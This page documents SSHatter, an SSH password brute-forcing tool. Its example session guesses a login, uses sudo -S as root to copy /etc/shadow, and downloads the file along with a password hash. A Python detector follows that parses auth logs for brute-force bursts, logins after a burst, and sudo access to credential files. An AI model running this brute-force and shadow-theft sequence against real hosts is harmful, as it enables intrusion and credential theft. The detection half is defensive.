SSHatter

Example

x@localhost:~$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22

As you can see, I enumerated just one host (10.31.33.7) and found one user "y" with a password of "y". Now that's where the old SSHatter would stop, but hold on a minute: SSHatter 1.0 has a bunch of features for post-brute-force exploration:

x@localhost:~$ ./SSHatter.pl -x 5 -t testdata/t -u testdata/u -p testdata/p -0 -s -i
I: 10.31.33.7:22
I: 10.31.33.7:22 finished
y:y@10.31.33.7:22
W: executing in interactive mode, continue? [y/N] y
$ id
[y:y@10.31.33.7:22]$ id
uid=1002(y) gid=1003(y) groups=1003(y)
$ sudo -S -l
[y:y@10.31.33.7:22]$ sudo -S -l
Matching Defaults entries for y on this host:
    env_reset

User y may run the following commands on this host:
    (ALL) ALL
$ sudo -S cp /etc/shadow shadow
[y:y@10.31.33.7:22]$ sudo -S cp /etc/shadow shadow
$ sudo -S chown y shadow
[y:y@10.31.33.7:22]$ sudo -S chown y shadow
$ get shadow
[y:y@10.31.33.7:22]$ cat shadow
$ exit

As you can see, I reran SSHatter with the -i flag, which tells it that I want to use it in interactive mode. I was able to confirm my id and then make a call to sudo. Later versions of this popular access control tool have the -S flag, which tells it to read the password from standard input rather than from the pseudo-terminal. Combined with the -0 flag, this allows us to pass our newly discovered password through and execute commands as root. As you can see, I use this feature to take a copy of /etc/shadow and, once I have changed its ownership, issue the get command to download it:

x@localhost:~$ cat y@10.31.33.7:22-shadow | grep y
y:$8$ko3ACbLg$sI2Nq02nmGDPxSqJ9UA3zxTDOp5oNTSCKmAlDtbawyfc8NbR8qXmmVGHeHn2183UWrY0Ie8wlO/yf2dhiXHPP/:14554:0:99999:7::: 

Sure enough, I now have a copy of the shadow file on my local system. 
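From the defender's side, both halves of the session above leave a clear trace in the target's auth log: a burst of "Failed password" lines from one source address, an "Accepted password" from that same address moments later, and a sudo entry whose COMMAND references /etc/shadow with TTY=unknown (sudo records no terminal when the password arrives on standard input over a plain exec channel, as with -S here). The following script is an added example and is not part of SSHatter or this page; it parses the standard syslog-format lines written by OpenSSH sshd and sudo and raises an alert for each of those three events. The sample log lines are constructed for this example (the address 10.31.33.7 and user "y" are taken from the transcript above; timestamps, PIDs and ports are made up), and the threshold of five failures per minute and the assumed year 2011 are choices of the example, not anything the page specifies.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in the syslog format written by OpenSSH sshd and sudo.
# Host 10.31.33.7 and user "y" come from the transcript on this page; the
# timestamps, PIDs and ports are invented for the example.
SAMPLE_LOG = """\
Feb 16 12:14:01 target sshd[2001]: Failed password for invalid user admin from 10.31.33.7 port 50001 ssh2
Feb 16 12:14:01 target sshd[2002]: Failed password for invalid user test from 10.31.33.7 port 50002 ssh2
Feb 16 12:14:02 target sshd[2003]: Failed password for y from 10.31.33.7 port 50003 ssh2
Feb 16 12:14:02 target sshd[2004]: Failed password for y from 10.31.33.7 port 50004 ssh2
Feb 16 12:14:03 target sshd[2005]: Failed password for y from 10.31.33.7 port 50005 ssh2
Feb 16 12:14:03 target sshd[2006]: Accepted password for y from 10.31.33.7 port 50006 ssh2
Feb 16 12:14:20 target sudo:        y : TTY=unknown ; PWD=/home/y ; USER=root ; COMMAND=/bin/cp /etc/shadow shadow
Feb 16 12:14:21 target sudo:        y : TTY=unknown ; PWD=/home/y ; USER=root ; COMMAND=/bin/chown y shadow
Feb 16 12:30:00 target sshd[2100]: Accepted publickey for alice from 10.0.0.5 port 40001 ssh2
Feb 16 12:31:00 target sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

# Syslog prefix: "<Mon> <day> <HH:MM:SS> <host> <program>[pid]: <message>"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (?P<prog>sshd|sudo)(?:\[\d+\])?: (?P<msg>.*)$"
)
# sshd authentication result lines ("invalid user" appears for unknown accounts)
SSH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
# sudo's default log line: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"^\s*(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=\S+ ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Files whose appearance in a sudo COMMAND is worth an alert on its own.
SENSITIVE_FILES = ("/etc/shadow", "/etc/gshadow", "/etc/sudoers")


def parse_ts(text, year=2011):
    """Syslog timestamps carry no year; the caller supplies one (2011 assumed here)."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def analyze(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return a list of (kind, detail) alerts found in the given auth log text.

    kinds: ssh_bruteforce            - >= threshold failed logins from one IP inside window
           ssh_success_after_bruteforce - a successful login from an IP already flagged
           sudo_sensitive_file       - a sudo command naming a credential/policy file
    """
    failures = defaultdict(deque)  # source IP -> timestamps of recent failures
    flagged_ips = set()
    alerts = []
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        if m["prog"] == "sshd":
            s = SSH_RE.match(m["msg"])
            if not s:
                continue
            ip, user = s["ip"], s["user"]
            if s["result"] == "Failed":
                recent = failures[ip]
                recent.append(ts)
                # Drop failures that fell out of the sliding window.
                while recent and ts - recent[0] > window:
                    recent.popleft()
                if len(recent) >= threshold and ip not in flagged_ips:
                    flagged_ips.add(ip)
                    alerts.append(("ssh_bruteforce",
                                   f"{len(recent)} failed logins from {ip} within {window}"))
            elif ip in flagged_ips:
                # The guessing stopped because a credential worked: highest priority.
                alerts.append(("ssh_success_after_bruteforce",
                               f"{user} logged in from {ip} via {s['method']}"))
        else:
            u = SUDO_RE.match(m["msg"])
            if not u:
                continue
            if any(path in u["cmd"] for path in SENSITIVE_FILES):
                note = " (no terminal: password supplied on stdin)" if u["tty"] == "unknown" else ""
                alerts.append(("sudo_sensitive_file",
                               f"{u['user']} ran as {u['target']}: {u['cmd']}{note}"))
    return alerts


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_LOG):
        print(f"{kind}: {detail}")
```

On the constructed sample this yields three alerts in order: the brute-force burst from 10.31.33.7, the "Accepted password" for y from the same address, and the sudo copy of /etc/shadow with TTY=unknown; alice's key-based login and ordinary sudo use produce nothing. The success-after-burst alert is the one to page on, since it marks the point at which the guessing stopped because a credential worked.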
Last Updated : 16/02/2011 12:14:04